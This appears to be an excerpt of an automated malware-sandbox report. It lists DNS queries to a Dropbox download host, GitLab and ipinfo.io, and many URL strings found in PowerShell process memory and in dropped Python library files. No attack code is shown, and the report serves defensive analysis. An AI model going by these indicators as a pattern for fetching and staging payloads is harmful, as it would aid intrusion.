            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; img-src https://* data: blob: ; base-uri 'self' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
            Source: global trafficDNS traffic detected: DNS query: ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.com
            Source: global trafficDNS traffic detected: DNS query: gitlab.com
            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
            Source: test_urllib2net.py.17.drString found in binary or memory: http://%s/not/found.h
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/sp%E4m
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/spam
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/spammity/sp%E4m
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/spammity/spam
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/spammity/spam;cookie=1234
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/spammity/spam;ham
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/spammity/spam?s%E4y=ni
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1/spammity/spam?say=ni
            Source: test_wsgiref.py.17.drString found in binary or memory: http://127.0.0.1:8000/
            Source: __init__.py25.17.drString found in binary or memory: http://bugs.python.org/issue19734
            Source: __init__.py25.17.drString found in binary or memory: http://bugs.python.org/issue20053
            Source: filesystem.py.17.drString found in binary or memory: http://bugs.python.org/issue22107
            Source: filesystem.py.17.drString found in binary or memory: http://bugs.python.org/issue2528
            Source: test_DSA.py.17.drString found in binary or memory: http://csrc.nist.gov/publications/fips/fips186-2/fips186-2-change1.pdf
            Source: _mode_cbc.cpython-312.pyc.17.drString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
            Source: powershell.exe, 0000000D.00000002.1380394770.00000187535AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
            Source: url.py.17.drString found in binary or memory: http://google.com/mail/
            Source: ChangeLog.17.drString found in binary or memory: http://idlefork.sourceforge.net
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875392C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1397199570.00000187620F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1397199570.0000018761FB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1583417160.0000023E101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1583417160.0000023E10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01A5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2536038120.0000022F90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: test_ECC_NIST.py.17.drString found in binary or memory: http://point-at-infinity.org/ecc/nisttv
            Source: req_file.cpython-312.pyc.17.drString found in binary or memory: http://pubs.opengroup.org/onlinepubs/9699919799/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018751F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: logging-cookbook.html.17.drString found in binary or memory: http://supervisord.org/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F81783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F8178E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tango.freedesktop.org/Tango_Desktop_Project
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F82549000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F82518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tix.sourceforge.net
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F8253A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F82549000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tix.sourceforge.net.
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F8253A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F824F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F82504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F82549000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F82518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tix.sourceforge.net/Tide.
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F82518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tix.sourceforge.net/Tixapps/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F80833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1320
            Source: url.py.17.drString found in binary or memory: http://tools.ietf.org/html/rfc3986#section-5.2.4
            Source: powershell.exe, 0000000D.00000002.1380394770.00000187535AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.com
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
            Source: powershell.exe, 00000011.00000002.2549782222.0000022FF0E51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.oF
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
            Source: test_urllib2net.py.17.drString found in binary or memory: http://www.imdb.com
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.indowsway.com/floatingpoint.htm
            Source: ChangeLog.17.drString found in binary or memory: http://www.python.doc/current/
            Source: test_urllib2net.py.17.drString found in binary or memory: http://www.python.org/
            Source: test_urllib2net.py.17.drString found in binary or memory: http://www.python.org/test/test_urllib2/basic_auth
            Source: test_urllib2net.py.17.drString found in binary or memory: http://www.pythontest.net/elsewhere/#frag
            Source: test_urllib2net.py.17.drString found in binary or memory: http://www.pythontest.net/index.html#frag
            Source: test_urllib2net.py.17.drString found in binary or memory: http://www.pythontest.net/redir/with_frag/
            Source: test_wsgiref.py.17.drString found in binary or memory: https://127.0.0.1/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018751F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
            Source: ast.html.17.drString found in binary or memory: https://asttokens.readthedocs.io/en/latest/user-guide.html
            Source: gettext.html.17.drString found in binary or memory: https://babel.pocoo.org/
            Source: test_weakref.py.17.drString found in binary or memory: https://bugs.python.org/issue3100
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue37179
            Source: logging-cookbook.html.17.drString found in binary or memory: https://bugs.python.org/issue3770
            Source: ftplib.py.17.drString found in binary or memory: https://bugs.python.org/issue43285
            Source: __init__.py.17.drString found in binary or memory: https://bugs.python.org/issue44860
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
            Source: test_ECC_NIST.py.17.drString found in binary or memory: https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.204.9073&rep=rep1&type=pdf
            Source: bisect.html.17.drString found in binary or memory: https://code.activestate.com/recipes/577197-sortedcollection/
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
            Source: powershell.exe, 00000011.00000002.2536038120.0000022F90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000011.00000002.2536038120.0000022F90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000011.00000002.2536038120.0000022F90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F81783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F8178E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/licenses/by-sa/3.0/)
            Source: pyopenssl.cpython-312.pyc.17.drString found in binary or memory: https://cryptography.io
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
            Source: email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2045.html
            Source: email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2046.html
            Source: email.utils.html.17.dr, email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2047.html
            Source: email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2183.html
            Source: email.utils.html.17.dr, email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2231.html
            Source: email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2821.html
            Source: email.utils.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc2822.html
            Source: logging-cookbook.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3164.html
            Source: logging.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc3339.html
            Source: email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5322.html
            Source: logging-cookbook.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5424.html
            Source: logging-cookbook.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5424.html#section-6
            Source: email.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc6532.html
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F8081E000.00000004.00000800.00020000.00000000.sdmp, eddsa.py.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc8032#page-41
            Source: gettext.html.17.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc822.html
            Source: functional.html.17.drString found in binary or memory: https://developer.ibm.com/articles/l-prog/
            Source: functional.html.17.drString found in binary or memory: https://developer.ibm.com/tutorials/l-prog2/
            Source: functional.html.17.drString found in binary or memory: https://developer.ibm.com/tutorials/l-prog3/
            Source: gc.html.17.drString found in binary or memory: https://devguide.python.org/garbage_collector/#collecting-the-oldest-generation
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
            Source: logging-cookbook.html.17.drString found in binary or memory: https://docs.djangoproject.com/en/stable/topics/logging/#configuring-logging
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmp, asyncio-queue.html.17.dr, asyncio-sync.html.17.dr, bisect.html.17.dr, audit_events.html.17.dr, email.utils.html.17.dr, curses.panel.html.17.dr, unicode.html.17.dr, logging-cookbook.html.17.dr, gc.html.17.dr, codeop.html.17.dr, crypto.html.17.dr, sorting.html.17.dr, copy.html.17.dr, datatypes.html.17.dr, bdb.html.17.dr, fileformats.html.17.dr, asyncio-api-index.html.17.dr, asyncio-policy.html.17.dr, gzip.html.17.dr, asyncio.html.17.drString found in binary or memory: https://docs.python.org/3/_static/og-image.png
            Source: functional.html.17.drString found in binary or memory: https://docs.python.org/3/howto/functional.html
            Source: ipaddress.html.17.drString found in binary or memory: https://docs.python.org/3/howto/ipaddress.html
            Source: isolating-extensions.html.17.drString found in binary or memory: https://docs.python.org/3/howto/isolating-extensions.html
            Source: logging-cookbook.html.17.drString found in binary or memory: https://docs.python.org/3/howto/logging-cookbook.html
            Source: logging.html.17.drString found in binary or memory: https://docs.python.org/3/howto/logging.html
            Source: sorting.html.17.drString found in binary or memory: https://docs.python.org/3/howto/sorting.html
            Source: unicode.html.17.drString found in binary or memory: https://docs.python.org/3/howto/unicode.html
            Source: ast.html.17.drString found in binary or memory: https://docs.python.org/3/library/ast.html
            Source: asyncio-api-index.html.17.drString found in binary or memory: https://docs.python.org/3/library/asyncio-api-index.html
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
            Source: asyncio-extending.html.17.drString found in binary or memory: https://docs.python.org/3/library/asyncio-extending.html
            Source: asyncio-policy.html.17.drString found in binary or memory: https://docs.python.org/3/library/asyncio-policy.html
            Source: asyncio-queue.html.17.drString found in binary or memory: https://docs.python.org/3/library/asyncio-queue.html
            Source: asyncio-runner.html.17.drString found in binary or memory: https://docs.python.org/3/library/asyncio-runner.html
            Source: asyncio-sync.html.17.drString found in binary or memory: https://docs.python.org/3/library/asyncio-sync.html
            Source: asyncio.html.17.drString found in binary or memory: https://docs.python.org/3/library/asyncio.html
            Source: audit_events.html.17.drString found in binary or memory: https://docs.python.org/3/library/audit_events.html
            Source: bdb.html.17.drString found in binary or memory: https://docs.python.org/3/library/bdb.html
            Source: bisect.html.17.drString found in binary or memory: https://docs.python.org/3/library/bisect.html
            Source: codeop.html.17.drString found in binary or memory: https://docs.python.org/3/library/codeop.html
            Source: concurrent.html.17.drString found in binary or memory: https://docs.python.org/3/library/concurrent.html
            Source: contextvars.html.17.drString found in binary or memory: https://docs.python.org/3/library/contextvars.html
            Source: copy.html.17.drString found in binary or memory: https://docs.python.org/3/library/copy.html
            Source: crypto.html.17.drString found in binary or memory: https://docs.python.org/3/library/crypto.html
            Source: curses.panel.html.17.drString found in binary or memory: https://docs.python.org/3/library/curses.panel.html
            Source: datatypes.html.17.drString found in binary or memory: https://docs.python.org/3/library/datatypes.html
            Source: development.html.17.drString found in binary or memory: https://docs.python.org/3/library/development.html
            Source: email.charset.html.17.drString found in binary or memory: https://docs.python.org/3/library/email.charset.html
            Source: email.html.17.drString found in binary or memory: https://docs.python.org/3/library/email.html
            Source: email.iterators.html.17.drString found in binary or memory: https://docs.python.org/3/library/email.iterators.html
            Source: email.mime.html.17.drString found in binary or memory: https://docs.python.org/3/library/email.mime.html
            Source: email.utils.html.17.drString found in binary or memory: https://docs.python.org/3/library/email.utils.html
            Source: exceptions.html.17.drString found in binary or memory: https://docs.python.org/3/library/exceptions.html
            Source: fileformats.html.17.drString found in binary or memory: https://docs.python.org/3/library/fileformats.html
            Source: frameworks.html.17.drString found in binary or memory: https://docs.python.org/3/library/frameworks.html
            Source: gc.html.17.drString found in binary or memory: https://docs.python.org/3/library/gc.html
            Source: gettext.html.17.drString found in binary or memory: https://docs.python.org/3/library/gettext.html
            Source: grp.html.17.drString found in binary or memory: https://docs.python.org/3/library/grp.html
            Source: gzip.html.17.drString found in binary or memory: https://docs.python.org/3/library/gzip.html
            Source: html.html.17.drString found in binary or memory: https://docs.python.org/3/library/html.html
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSION)
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/tutorial/floatingpoint.html
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
            Source: unicode.html.17.drString found in binary or memory: https://downloads.egenix.com/python/LSM2005-Developing-Unicode-aware-applications-in-Python.pdf
            Source: unicode.html.17.drString found in binary or memory: https://downloads.egenix.com/python/Unicode-EPC2002-Talk.pdf
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F807EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dx.doi.org/10.1007/BFb0055716
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F8090B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eli.thegreenplace.net/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
            Source: ssl_.py.17.drString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3129
            Source: ssl_.py.17.drString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
            Source: logging-cookbook.html.17.drString found in binary or memory: https://gist.github.com/vsajip/4b227eeec43817465ca835ca66f75e2b
            Source: __init__.py.17.drString found in binary or memory: https://github.com/Homebrew/homebrew-core/issues/76621
            Source: _raw_api.py.17.drString found in binary or memory: https://github.com/Legrandin/pycryptodome/issues/228
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
            Source: pyopenssl.cpython-312.pyc.17.drString found in binary or memory: https://github.com/kjd/idna
            Source: ssl_.py.17.drString found in binary or memory: https://github.com/openssl/openssl/issues/14579
            Source: _raw_api.py.17.drString found in binary or memory: https://github.com/pallets/click/blob/master/src/click/_winconsole.py
            Source: gettext.html.17.drString found in binary or memory: https://github.com/pinard/po-utils
            Source: __init__.py.17.drString found in binary or memory: https://github.com/pypa/pip/issues/10151
            Source: __init__.py.17.drString found in binary or memory: https://github.com/pypa/pip/issues/10647
            Source: wheel.py.17.drString found in binary or memory: https://github.com/pypa/pip/issues/1150)
            Source: entrypoints.py.17.drString found in binary or memory: https://github.com/pypa/pip/issues/5599
            Source: req_file.cpython-312.pyc.17.drString found in binary or memory: https://github.com/pypa/pip/pull/3514
            Source: compat.cpython-312.pyc.17.drString found in binary or memory: https://github.com/pypa/pip/pull/935#discussion_r5307003
            Source: egg_link.cpython-312.pyc.17.drString found in binary or memory: https://github.com/pypa/setuptools/issues/4167).
            Source: url.py.17.drString found in binary or memory: https://github.com/python-hyper/rfc3986
            Source: __init__.py.17.drString found in binary or memory: https://github.com/python/cpython/blob/8c21941ddaf/Lib/sysconfig.py#L178-L194
            Source: functional.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/functional.rst
            Source: ipaddress.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/ipaddress.rst
            Source: isolating-extensions.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/isolating-extensions.rst
            Source: logging-cookbook.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/logging-cookbook.rst
            Source: logging.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/logging.rst
            Source: sorting.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/sorting.rst
            Source: unicode.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/unicode.rst
            Source: ast.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/ast.rst
            Source: asyncio-api-index.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio-api-index.rst
            Source: asyncio-extending.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio-extending.rst
            Source: asyncio-policy.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio-policy.rst
            Source: asyncio-queue.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio-queue.rst
            Source: asyncio-runner.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio-runner.rst
